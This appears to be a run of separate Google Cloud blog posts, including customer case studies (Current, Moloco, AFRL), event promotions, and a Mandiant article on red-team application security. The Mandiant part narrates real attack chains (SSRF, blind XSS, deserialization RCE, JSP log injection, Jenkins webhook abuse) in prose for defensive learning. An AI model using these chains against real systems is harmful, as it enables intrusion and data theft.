Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools -Thornton Craig et al, December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5581c88730>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improves our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced recovery time objectives (RTO) and improved recovery point objectives (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week.Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions of more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data and processes bid requests per day at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e55818530a0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem.The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads that are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable auto scaling for multi host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.”–Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to enable businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, problem-solving with our top partners and seize the opportunity to learn from top experts and peers tackling the same challenges you are day in and day out. Walk away with new ideas, breakthrough skills and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt to cutting edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and having the right system communications and integrations across third party infrastructure. Because of this, cross-team collaboration and experiment expansion was severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process resulted in challenges in providing scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Scripts, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud utilizes various infrastructure services, such as Cloud Run, Cloud SQL, and GKE and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.
Streamlined AI model development with Vertex AI:
The AFRL wanted to replicate the functionality of university HPC clusters, especially since there was a diversity of users that needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build and much more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to do model development and testing in an accelerated manner.
Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most of the infrastructure typically receive a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the various application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators will perform most of the remaining activities at this point, the AppSec consultants will stay close to the engagement and often engage to further support internal exploitations efforts. For example, applications that are only accessible internally generally get a lot less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve achieved a significant increase of engagements where our Red Team successfully gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application.The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). Apache Software Foundation assigned CVE-2022-46366 for this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application brought additional attention upon discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was uniquely distinct, making it highly unlikely to be discovered with conventional directory brute-forcing methods.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications were redirecting to the customer’s single-sign on (SSO) provider. However, one application had a different behavior. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials of a developer for an enterprise source control application account. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins—an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately in remote code execution, effectively compromising the organization’s CI/CD pipeline.
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
